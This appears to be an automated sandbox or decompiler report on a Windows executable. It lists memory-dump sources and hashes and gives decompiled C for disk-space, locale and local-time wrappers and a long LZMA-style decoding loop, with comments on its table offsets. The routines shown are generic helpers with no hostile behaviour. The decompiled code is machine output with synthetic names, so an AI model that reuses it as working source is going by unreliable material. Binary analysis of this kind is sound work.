                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Locale$Info$Valid
                                                                                    • String ID:
                                                                                    • API String ID: 1826331170-0
                                                                                    • Opcode ID: 62325bdbcd9f8bf22caa424e6d98428fadf2f4ef7d6ad95b5286de9b97f55654
                                                                                    • Instruction ID: 92a11a0233c3b219485afac9e49f2dea99407596d6f7a83949ef3a6145fdf69e
                                                                                    • Opcode Fuzzy Hash: 62325bdbcd9f8bf22caa424e6d98428fadf2f4ef7d6ad95b5286de9b97f55654
                                                                                    • Instruction Fuzzy Hash: 3831AE70A00308ABDF20DB64DD81BDEBBB9FB48701F5005BBA508B32D1D6395E90CE1A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0041A4DC(WCHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                                    				long _v8;
                                                                                    				long _v12;
                                                                                    				long _v16;
                                                                                    				long _v20;
                                                                                    				intOrPtr _v24;
                                                                                    				signed int _v28;
                                                                                    				WCHAR* _t25;
                                                                                    				int _t26;
                                                                                    				intOrPtr _t31;
                                                                                    				intOrPtr _t34;
                                                                                    				intOrPtr* _t37;
                                                                                    				intOrPtr* _t38;
                                                                                    				intOrPtr _t46;
                                                                                    				intOrPtr _t48;
                                                                                    
                                                                                    				_t25 = _a4;
                                                                                    				if(_t25 == 0) {
                                                                                    					_t25 = 0;
                                                                                    				}
                                                                                    				_t26 = GetDiskFreeSpaceW(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
                                                                                    				_v28 = _v8 * _v12;
                                                                                    				_v24 = 0;
                                                                                    				_t46 = _v24;
                                                                                    				_t31 = E004095A8(_v28, _t46, _v16, 0);
                                                                                    				_t37 = _a8;
                                                                                    				 *_t37 = _t31;
                                                                                    				 *((intOrPtr*)(_t37 + 4)) = _t46;
                                                                                    				_t48 = _v24;
                                                                                    				_t34 = E004095A8(_v28, _t48, _v20, 0);
                                                                                    				_t38 = _a12;
                                                                                    				 *_t38 = _t34;
                                                                                    				 *((intOrPtr*)(_t38 + 4)) = _t48;
                                                                                    				return _t26;
                                                                                    			}

                                                                                    APIs
                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 0041A4FD
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: DiskFreeSpace
                                                                                    • String ID:
                                                                                    • API String ID: 1705453755-0
                                                                                    • Opcode ID: 35fab30d3ed47bb79bc7b5801678cd6b626cb6661b26d0a6d4a2aa78d0844cce
                                                                                    • Instruction ID: 14c90aad059d6341cd8fbca9d1c94cd423dd62e4f1f0ed92fc39ecac232c4210
                                                                                    • Opcode Fuzzy Hash: 35fab30d3ed47bb79bc7b5801678cd6b626cb6661b26d0a6d4a2aa78d0844cce
                                                                                    • Instruction Fuzzy Hash: 7711C0B5A01209AFDB04CF9ACD819EFB7F9EFC8304B14C569A505E7255E6319E018B94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0041E034(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
                                                                                    				short _v516;
                                                                                    				void* __ebp;
                                                                                    				int _t5;
                                                                                    				intOrPtr _t10;
                                                                                    				void* _t18;
                                                                                    
                                                                                    				_t18 = __ecx;
                                                                                    				_t10 = _a4;
                                                                                    				_t5 = GetLocaleInfoW(__eax, __edx,  &_v516, 0x100);
                                                                                    				_t19 = _t5;
                                                                                    				if(_t5 <= 0) {
                                                                                    					return E00407E00(_t10, _t18);
                                                                                    				}
                                                                                    				return E00407BA8(_t10, _t5 - 1,  &_v516, _t19);
                                                                                    			}

                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 2299586839-0
                                                                                    • Opcode ID: d1249f9bfb9152180de995f4510b089303b0330b3d36e5e1fa950d916a740853
                                                                                    • Instruction ID: c90943d4e22265a1f7ecf9aede9ac9faa011377f579ac525cbc4109061889d1c
                                                                                    • Opcode Fuzzy Hash: d1249f9bfb9152180de995f4510b089303b0330b3d36e5e1fa950d916a740853
                                                                                    • Instruction Fuzzy Hash: C7E09235B0421427E314A55A9C86AE7725D9B48340F40457FBD05D7382EDB9AE8042E9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 79%
                                                                                    			E0041E080(int __eax, signed int __ecx, int __edx) {
                                                                                    				short _v16;
                                                                                    				signed int _t5;
                                                                                    				signed int _t10;
                                                                                    
                                                                                    				_push(__ecx);
                                                                                    				_t10 = __ecx;
                                                                                    				if(GetLocaleInfoW(__eax, __edx,  &_v16, 2) <= 0) {
                                                                                    					_t5 = _t10;
                                                                                    				} else {
                                                                                    					_t5 = _v16 & 0x0000ffff;
                                                                                    				}
                                                                                    				return _t5;
                                                                                    			}

                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 2299586839-0
                                                                                    • Opcode ID: c2a2e253f202cad765f8f9b35123567cb33a3e9031303696ff7b3b42dc5ba059
                                                                                    • Instruction ID: 961adf842b5e4829a7f1cb68f4be235500f18d0b61d537998bbd462cca006134
                                                                                    • Opcode Fuzzy Hash: c2a2e253f202cad765f8f9b35123567cb33a3e9031303696ff7b3b42dc5ba059
                                                                                    • Instruction Fuzzy Hash: 45D05EBA31923476E214915B6E85DB75ADCCBC87A2F14483BBE4CC6241D2A4CC46A275
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004AF218(signed int __eax) {
                                                                                    				short _v8;
                                                                                    				signed int _t6;
                                                                                    
                                                                                    				_t6 = GetLocaleInfoW(__eax & 0x0000ffff, 0x20001004,  &_v8, 2);
                                                                                    				if(_t6 <= 0) {
                                                                                    					return _t6 | 0xffffffff;
                                                                                    				}
                                                                                    				return _v8;
                                                                                    			}

                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,004AF318), ref: 004AF22E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 2299586839-0
                                                                                    • Opcode ID: 91ef75d91c3bf0fbfb4c903f00eadddcc0e9dd42321a82c412adf8826a4a964a
                                                                                    • Instruction ID: 3cbbb47bc5e3852376f83ef88ad8e7e21f22c900a58d153b56eed97a123c5839
                                                                                    • Opcode Fuzzy Hash: 91ef75d91c3bf0fbfb4c903f00eadddcc0e9dd42321a82c412adf8826a4a964a
                                                                                    • Instruction Fuzzy Hash: E8D0A5F55442087DF504C1DA5D82FB673DCD705374F500767F654C52C1D567EE015219
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0041C3D8() {
                                                                                    				struct _SYSTEMTIME* _t2;
                                                                                    
                                                                                    				GetLocalTime(_t2);
                                                                                    				return _t2->wYear & 0x0000ffff;
                                                                                    			}

                                                                                    APIs
                                                                                    • 0x0041c3dc
                                                                                    • 0x0041c3e8

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: LocalTime
                                                                                    • String ID:
                                                                                    • API String ID: 481472006-0
                                                                                    • Opcode ID: 2bbd9f916a85fd19aaf3e135de3c6f6031220cebfdbc254b78c71648618a48a1
                                                                                    • Instruction ID: 79eafb11b28f80ce797d6e9fe134e5764476c7cb5db39d72cf417c4d7be8b418
                                                                                    • Opcode Fuzzy Hash: 2bbd9f916a85fd19aaf3e135de3c6f6031220cebfdbc254b78c71648618a48a1
                                                                                    • Instruction Fuzzy Hash: DAA0122080582011D140331A0C0313530405900620FC40F55BCF8542D1E93D013440D7
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			// Decompiled LZMA-style match/literal decoding loop (listing is truncated below).
                                                                                    			// The offsets added to _v20 match the LZMA probability-table layout (16-bit probs,
                                                                                    			// so byte offset = 2 * index): IsMatch at 0, IsRep at 0x180, IsRepG0/G1/G2 at
                                                                                    			// 0x198/0x1b0/0x1c8, IsRep0Long at 0x1e0, PosSlot at 0x360, SpecPos at 0x560,
                                                                                    			// Align at 0x644, LenCoder at 0x664, RepLenCoder at 0xa68.
                                                                                    			// Register/stack roles as read from the body: _v68/_v72 dictionary window and its
                                                                                    			// size, _t616 current dictionary write position, _t617 rep0 distance,
                                                                                    			// _v44/_v48/_v52 rep1..rep3, _t474 coder state (7/8/10/11 transitions),
                                                                                    			// _v32 posState mask, _v88 posState, _v56 remaining match length
                                                                                    			// (0xffffffff once the end marker was seen), _v24 bytes written to _v16, _a8 output
                                                                                    			// limit, *_a4 status out-parameter. E00425334, E004253BC, E00425400, E004254E4 and
                                                                                    			// E004252D4 are the bit, bit-tree, reverse bit-tree, length and direct-bits
                                                                                    			// decoders; their bodies are not part of this listing.
                                                                                    			E004255DC(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                    				intOrPtr* _v8;
                                                                                    				intOrPtr _v12;
                                                                                    				intOrPtr _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				signed int _v24;
                                                                                    				char _v25;
                                                                                    				signed int _v32;
                                                                                    				signed int _v36;
                                                                                    				signed int _v40;
                                                                                    				signed int _v44;
                                                                                    				signed int _v48;
                                                                                    				signed int _v52;
                                                                                    				signed int _v56;
                                                                                    				intOrPtr _v60;
                                                                                    				char _v64;
                                                                                    				char* _v68;
                                                                                    				void* _v72;
                                                                                    				char _v76;
                                                                                    				intOrPtr _v80;
                                                                                    				intOrPtr _v84;
                                                                                    				signed int _v88;
                                                                                    				char _v89;
                                                                                    				char _v96;
                                                                                    				signed int _v100;
                                                                                    				signed int _v104;
                                                                                    				short* _v108;
                                                                                    				signed int _v112;
                                                                                    				signed int _v116;
                                                                                    				intOrPtr _v120;
                                                                                    				intOrPtr _v124;
                                                                                    				intOrPtr _v128;
                                                                                    				intOrPtr _v132;
                                                                                    				char _v136;
                                                                                    				signed int _t370;
                                                                                    				void* _t375;
                                                                                    				signed int _t377;
                                                                                    				signed int _t381;
                                                                                    				signed int _t389;
                                                                                    				signed int _t395;
                                                                                    				signed int _t411;
                                                                                    				intOrPtr _t422;
                                                                                    				signed int _t426;
                                                                                    				signed int _t435;
                                                                                    				void* _t448;
                                                                                    				signed int _t458;
                                                                                    				char _t460;
                                                                                    				signed int _t474;
                                                                                    				char* _t503;
                                                                                    				signed int _t508;
                                                                                    				signed int _t616;
                                                                                    				signed int _t617;
                                                                                    				signed int _t618;
                                                                                    				signed int _t622;
                                                                                    
                                                                                    				_v16 = __ecx;
                                                                                    				_v12 = __edx;
                                                                                    				_v8 = __eax;
                                                                                    				_v20 =  *((intOrPtr*)(_v8 + 0x10));
                                                                                    				_v24 = 0;
                                                                                    				_v32 = (1 <<  *(_v8 + 8)) - 1;
                                                                                    				_v36 = (1 <<  *(_v8 + 4)) - 1;
                                                                                    				_v40 =  *_v8;
                                                                                    				_t617 =  *((intOrPtr*)(_v8 + 0x34));
                                                                                    				_t474 =  *(_v8 + 0x44);
                                                                                    				_v44 =  *((intOrPtr*)(_v8 + 0x38));
                                                                                    				_v48 =  *((intOrPtr*)(_v8 + 0x3c));
                                                                                    				_v52 =  *((intOrPtr*)(_v8 + 0x40));
                                                                                    				_v56 =  *((intOrPtr*)(_v8 + 0x48));
                                                                                    				_v60 =  *((intOrPtr*)(_v8 + 0x2c));
                                                                                    				_v64 =  *((intOrPtr*)(_v8 + 0x30));
                                                                                    				_v68 =  *((intOrPtr*)(_v8 + 0x1c));
                                                                                    				_v72 =  *((intOrPtr*)(_v8 + 0xc));
                                                                                    				_t616 =  *((intOrPtr*)(_v8 + 0x28));
                                                                                    				_v128 =  *((intOrPtr*)(_v8 + 0x20));
                                                                                    				_v124 =  *((intOrPtr*)(_v8 + 0x24));
                                                                                    				_v120 = _v12;
                                                                                    				_v136 =  *((intOrPtr*)(_v8 + 0x14));
                                                                                    				_v132 =  *((intOrPtr*)(_v8 + 0x18));
                                                                                    				 *_a4 = 0;
                                                                                    				if(_v56 == 0xffffffff) {
                                                                                    					return 0;
                                                                                    				}
                                                                                    				__eflags = _v72;
                                                                                    				if(_v72 == 0) {
                                                                                    					_v68 =  &_v76;
                                                                                    					_v72 = 1;
                                                                                    					_v76 =  *((intOrPtr*)(_v8 + 0x4c));
                                                                                    				}
                                                                                    				__eflags = _v56 - 0xfffffffe;
                                                                                    				if(_v56 != 0xfffffffe) {
                                                                                    					L12:
                                                                                    					_v108 = _v16 + _v24;
                                                                                    					while(1) {
                                                                                    						__eflags = _v56;
                                                                                    						if(_v56 == 0) {
                                                                                    							break;
                                                                                    						}
                                                                                    						__eflags = _v24 - _a8;
                                                                                    						if(_v24 < _a8) {
                                                                                    							_t458 = _t616 - _t617;
                                                                                    							__eflags = _t458 - _v72;
                                                                                    							if(_t458 >= _v72) {
                                                                                    								_t458 = _t458 + _v72;
                                                                                    								__eflags = _t458;
                                                                                    							}
                                                                                    							_t460 =  *((intOrPtr*)(_v68 + _t458));
                                                                                    							 *((char*)(_v68 + _t616)) = _t460;
                                                                                    							 *_v108 = _t460;
                                                                                    							_v24 = _v24 + 1;
                                                                                    							_v108 = _v108 + 1;
                                                                                    							_t616 = _t616 + 1;
                                                                                    							__eflags = _t616 - _v72;
                                                                                    							if(_t616 == _v72) {
                                                                                    								_t616 = 0;
                                                                                    								__eflags = 0;
                                                                                    							}
                                                                                    							_t116 =  &_v56;
                                                                                    							 *_t116 = _v56 - 1;
                                                                                    							__eflags =  *_t116;
                                                                                    							continue;
                                                                                    						}
                                                                                    						break;
                                                                                    					}
                                                                                    					__eflags = _t616;
                                                                                    					if(_t616 != 0) {
                                                                                    						_v25 =  *((intOrPtr*)(_v68 + _t616 - 1));
                                                                                    					} else {
                                                                                    						_v25 =  *((intOrPtr*)(_v68 + _v72 - 1));
                                                                                    					}
                                                                                    					__eflags = 0;
                                                                                    					_v116 = 0;
                                                                                    					_v112 = 0;
                                                                                    					while(1) {
                                                                                    						L24:
                                                                                    						_v108 = _v16 + _v24;
                                                                                    						__eflags = _v24 - _a8;
                                                                                    						if(_v24 >= _a8) {
                                                                                    							break;
                                                                                    						} else {
                                                                                    							goto L25;
                                                                                    						}
                                                                                    						while(1) {
                                                                                    							L25:
                                                                                    							_v88 = _v24 + _v60 & _v32;
                                                                                    							__eflags = _v116;
                                                                                    							if(_v116 != 0) {
                                                                                    								break;
                                                                                    							}
                                                                                    							__eflags = _v112;
                                                                                    							if(_v112 == 0) {
                                                                                    								_t370 = E00425334((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88,  &_v136);
                                                                                    								__eflags = _t370;
                                                                                    								if(_t370 != 0) {
                                                                                    									_t375 = E00425334(_t474 + _t474 + _v20 + 0x180,  &_v136);
                                                                                    									__eflags = _t375 != 1;
                                                                                    									if(_t375 != 1) {
                                                                                    										_v52 = _v48;
                                                                                    										_v48 = _v44;
                                                                                    										_v44 = _t617;
                                                                                    										__eflags = _t474 - 7;
                                                                                    										if(__eflags >= 0) {
                                                                                    											_t377 = 0xa;
                                                                                    										} else {
                                                                                    											_t377 = 7;
                                                                                    										}
                                                                                    										_t474 = _t377;
                                                                                    										_v56 = E004254E4(_v20 + 0x664, _v88,  &_v136, __eflags);
                                                                                    										_t503 =  &_v136;
                                                                                    										__eflags = _v56 - 4;
                                                                                    										if(_v56 >= 4) {
                                                                                    											_t381 = 3;
                                                                                    										} else {
                                                                                    											_t381 = _v56;
                                                                                    										}
                                                                                    										_v100 = E004253BC((_t381 << 6) + (_t381 << 6) + _v20 + 0x360, _t503, 6);
                                                                                    										__eflags = _v100 - 4;
                                                                                    										if(_v100 < 4) {
                                                                                    											_t618 = _v100;
                                                                                    										} else {
                                                                                    											_v104 = (_v100 >> 1) - 1;
                                                                                    											_t524 = _v104;
                                                                                    											_t622 = (_v100 & 0x00000001 | 0x00000002) << _v104;
                                                                                    											__eflags = _v100 - 0xe;
                                                                                    											if(_v100 >= 0xe) {
                                                                                    												_t395 = E004252D4( &_v136, _t524, _v104 + 0xfffffffc);
                                                                                    												_t618 = _t622 + (_t395 << 4) + E00425400(_v20 + 0x644,  &_v136, 4);
                                                                                    											} else {
                                                                                    												_t618 = _t622 + E00425400(_t622 + _t622 + _v20 + 0x560 - _v100 + _v100 + 0xfffffffe,  &_v136, _v104);
                                                                                    											}
                                                                                    										}
                                                                                    										_t617 = _t618 + 1;
                                                                                    										__eflags = _t617;
                                                                                    										if(_t617 != 0) {
                                                                                    											L82:
                                                                                    											_v56 = _v56 + 2;
                                                                                    											__eflags = _t617 - _v64;
                                                                                    											if(_t617 <= _v64) {
                                                                                    												__eflags = _v72 - _v64 - _v56;
                                                                                    												if(_v72 - _v64 <= _v56) {
                                                                                    													_v64 = _v72;
                                                                                    												} else {
                                                                                    													_v64 = _v64 + _v56;
                                                                                    												}
                                                                                    												while(1) {
                                                                                    													_t389 = _t616 - _t617;
                                                                                    													__eflags = _t389 - _v72;
                                                                                    													if(_t389 >= _v72) {
                                                                                    														_t389 = _t389 + _v72;
                                                                                    														__eflags = _t389;
                                                                                    													}
                                                                                    													_v25 =  *((intOrPtr*)(_v68 + _t389));
                                                                                    													 *((char*)(_v68 + _t616)) = _v25;
                                                                                    													_t616 = _t616 + 1;
                                                                                    													__eflags = _t616 - _v72;
                                                                                    													if(_t616 == _v72) {
                                                                                    														_t616 = 0;
                                                                                    														__eflags = 0;
                                                                                    													}
                                                                                    													_v56 = _v56 - 1;
                                                                                    													 *_v108 = _v25;
                                                                                    													_v24 = _v24 + 1;
                                                                                    													_v108 = _v108 + 1;
                                                                                    													__eflags = _v56;
                                                                                    													if(_v56 == 0) {
                                                                                    														break;
                                                                                    													}
                                                                                    													__eflags = _v24 - _a8;
                                                                                    													if(_v24 < _a8) {
                                                                                    														continue;
                                                                                    													}
                                                                                    													break;
                                                                                    												}
                                                                                    												L93:
                                                                                    												__eflags = _v24 - _a8;
                                                                                    												if(_v24 < _a8) {
                                                                                    													continue;
                                                                                    												}
                                                                                    												goto L94;
                                                                                    											}
                                                                                    											return 1;
                                                                                    										} else {
                                                                                    											_v56 = 0xffffffff;
                                                                                    											goto L94;
                                                                                    										}
                                                                                    									}
                                                                                    									_t411 = E00425334(_t474 + _t474 + _v20 + 0x198,  &_v136);
                                                                                    									__eflags = _t411;
                                                                                    									if(_t411 != 0) {
                                                                                    										__eflags = E00425334(_t474 + _t474 + _v20 + 0x1b0,  &_v136);
                                                                                    										if(__eflags != 0) {
                                                                                    											__eflags = E00425334(_t474 + _t474 + _v20 + 0x1c8,  &_v136);
                                                                                    											if(__eflags != 0) {
                                                                                    												_t422 = _v52;
                                                                                    												_v52 = _v48;
                                                                                    											} else {
                                                                                    												_t422 = _v48;
                                                                                    											}
                                                                                    											_v48 = _v44;
                                                                                    										} else {
                                                                                    											_t422 = _v44;
                                                                                    										}
                                                                                    										_v44 = _t617;
                                                                                    										_t617 = _t422;
                                                                                    										L65:
                                                                                    										_v56 = E004254E4(_v20 + 0xa68, _v88,  &_v136, __eflags);
                                                                                    										__eflags = _t474 - 7;
                                                                                    										if(_t474 >= 7) {
                                                                                    											_t426 = 0xb;
                                                                                    										} else {
                                                                                    											_t426 = 8;
                                                                                    										}
                                                                                    										_t474 = _t426;
                                                                                    										goto L82;
                                                                                    									}
                                                                                    									__eflags = E00425334((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88 + 0x1e0,  &_v136);
                                                                                    									if(__eflags != 0) {
                                                                                    										goto L65;
                                                                                    									}
                                                                                    									__eflags = _v64;
                                                                                    									if(_v64 != 0) {
                                                                                    										__eflags = _t474 - 7;
                                                                                    										if(_t474 >= 7) {
                                                                                    											_t508 = 0xb;
                                                                                    										} else {
                                                                                    											_t508 = 9;
                                                                                    										}
                                                                                    										_t474 = _t508;
                                                                                    										_t435 = _t616 - _t617;
                                                                                    										__eflags = _t435 - _v72;
                                                                                    										if(_t435 >= _v72) {
                                                                                    											_t435 = _t435 + _v72;
                                                                                    											__eflags = _t435;
                                                                                    										}
                                                                                    										_v25 =  *((intOrPtr*)(_v68 + _t435));
                                                                                    										 *((char*)(_v68 + _t616)) = _v25;
                                                                                    										_t616 = _t616 + 1;
                                                                                    										__eflags = _t616 - _v72;
                                                                                    										if(_t616 == _v72) {
                                                                                    											_t616 = 0;
                                                                                    											__eflags = 0;
                                                                                    										}
                                                                                    										 *_v108 = _v25;
                                                                                    										_v24 = _v24 + 1;
                                                                                    										__eflags = _v64 - _v72;
                                                                                    										if(_v64 < _v72) {
                                                                                    											_v64 = _v64 + 1;
                                                                                    										}
                                                                                    										goto L24;
                                                                                    									}
                                                                                    									return 1;
                                                                                    								}
                                                                                    								_t448 = (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + _v20 + 0xe6c;
                                                                                    								__eflags = _t474 - 7;
                                                                                    								if(__eflags < 0) {
                                                                                    									_v25 = E00425444(_t448,  &_v136, __eflags);
                                                                                    								} else {
                                                                                    									_v96 = _t616 - _t617;
                                                                                    									__eflags = _v96 - _v72;
                                                                                    									if(__eflags >= 0) {
                                                                                    										_t161 =  &_v96;
                                                                                    										 *_t161 = _v96 + _v72;
                                                                                    										__eflags =  *_t161;
                                                                                    									}
                                                                                    									_v89 =  *((intOrPtr*)(_v68 + _v96));
                                                                                    									_v25 = E00425470(_t448, _v89,  &_v136, __eflags);
                                                                                    								}
                                                                                    								 *_v108 = _v25;
                                                                                    								_v24 = _v24 + 1;
                                                                                    								_v108 = _v108 + 1;
                                                                                    								__eflags = _v64 - _v72;
                                                                                    								if(_v64 < _v72) {
                                                                                    									_t180 =  &_v64;
                                                                                    									 *_t180 = _v64 + 1;
                                                                                    									__eflags =  *_t180;
                                                                                    								}
                                                                                    								 *((char*)(_v68 + _t616)) = _v25;
                                                                                    								_t616 = _t616 + 1;
                                                                                    								__eflags = _t616 - _v72;
                                                                                    								if(_t616 == _v72) {
                                                                                    									_t616 = 0;
                                                                                    									__eflags = 0;
                                                                                    								}
                                                                                    								__eflags = _t474 - 4;
                                                                                    								if(_t474 >= 4) {
                                                                                    									__eflags = _t474 - 0xa;
                                                                                    									if(_t474 >= 0xa) {
                                                                                    										_t474 = _t474 - 6;
                                                                                    									} else {
                                                                                    										_t474 = _t474 - 3;
                                                                                    									}
                                                                                    								} else {
                                                                                    									_t474 = 0;
                                                                                    								}
                                                                                    								goto L93;
                                                                                    							}
                                                                                    							return 1;
                                                                                    						}
                                                                                    						return _v116;
                                                                                    					}
                                                                                    					L94:
                                                                                    					 *((intOrPtr*)(_v8 + 0x20)) = _v128;
                                                                                    					 *((intOrPtr*)(_v8 + 0x24)) = _v124;
                                                                                    					 *((intOrPtr*)(_v8 + 0x28)) = _t616;
                                                                                    					 *((intOrPtr*)(_v8 + 0x2c)) = _v60 + _v24;
                                                                                    					 *((intOrPtr*)(_v8 + 0x30)) = _v64;
                                                                                    					 *((intOrPtr*)(_v8 + 0x34)) = _t617;
                                                                                    					 *((intOrPtr*)(_v8 + 0x38)) = _v44;
                                                                                    					 *((intOrPtr*)(_v8 + 0x3c)) = _v48;
                                                                                    					 *((intOrPtr*)(_v8 + 0x40)) = _v52;
                                                                                    					 *(_v8 + 0x44) = _t474;
                                                                                    					 *((intOrPtr*)(_v8 + 0x48)) = _v56;
                                                                                    					 *((char*)(_v8 + 0x4c)) = _v76;
                                                                                    					 *((intOrPtr*)(_v8 + 0x14)) = _v136;
                                                                                    					 *((intOrPtr*)(_v8 + 0x18)) = _v132;
                                                                                    					 *_a4 = _v24;
                                                                                    					__eflags = 0;
                                                                                    					return 0;
                                                                                    				}
                                                                                    				_v80 = (0x300 <<  *(_v8 + 4) + _v40) + 0x736;
                                                                                    				_v84 = 0;
                                                                                    				_v108 = _v20;
                                                                                    				__eflags = _v84 - _v80;
                                                                                    				if(_v84 >= _v80) {
                                                                                    					L7:
                                                                                    					_v52 = 1;
                                                                                    					_v48 = 1;
                                                                                    					_v44 = 1;
                                                                                    					_t617 = 1;
                                                                                    					_v60 = 0;
                                                                                    					_v64 = 0;
                                                                                    					_t474 = 0;
                                                                                    					_t616 = 0;
                                                                                    					 *((char*)(_v68 + _v72 - 1)) = 0;
                                                                                    					E00425294( &_v136);
                                                                                    					__eflags = _v116;
                                                                                    					if(_v116 != 0) {
                                                                                    						return _v116;
                                                                                    					}
                                                                                    					__eflags = _v112;
                                                                                    					if(_v112 == 0) {
                                                                                    						__eflags = 0;
                                                                                    						_v56 = 0;
                                                                                    						goto L12;
                                                                                    					} else {
                                                                                    						return 1;
                                                                                    					}
                                                                                    				} else {
                                                                                    					goto L6;
                                                                                    				}
                                                                                    				do {
                                                                                    					L6:
                                                                                    					 *_v108 = 0x400;
                                                                                    					_v84 = _v84 + 1;
                                                                                    					_v108 = _v108 + 2;
                                                                                    					__eflags = _v84 - _v80;
                                                                                    				} while (_v84 < _v80);
                                                                                    				goto L7;
                                                                                    			}
                                                                                    0x00425bdf
                                                                                    0x00425be2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00425be2
                                                                                    0x00000000
                                                                                    0x00425b62
                                                                                    0x00425b62
                                                                                    0x00000000
                                                                                    0x00425b62
                                                                                    0x00425b60
                                                                                    0x0042594f
                                                                                    0x00425954
                                                                                    0x00425956
                                                                                    0x00425a06
                                                                                    0x00425a08
                                                                                    0x00425a26
                                                                                    0x00425a28
                                                                                    0x00425a2f
                                                                                    0x00425a35
                                                                                    0x00425a2a
                                                                                    0x00425a2a
                                                                                    0x00425a2a
                                                                                    0x00425a3b
                                                                                    0x00425a0a
                                                                                    0x00425a0a
                                                                                    0x00425a0a
                                                                                    0x00425a3e
                                                                                    0x00425a41
                                                                                    0x00425a43
                                                                                    0x00425a59
                                                                                    0x00425a5c
                                                                                    0x00425a5f
                                                                                    0x00425a68
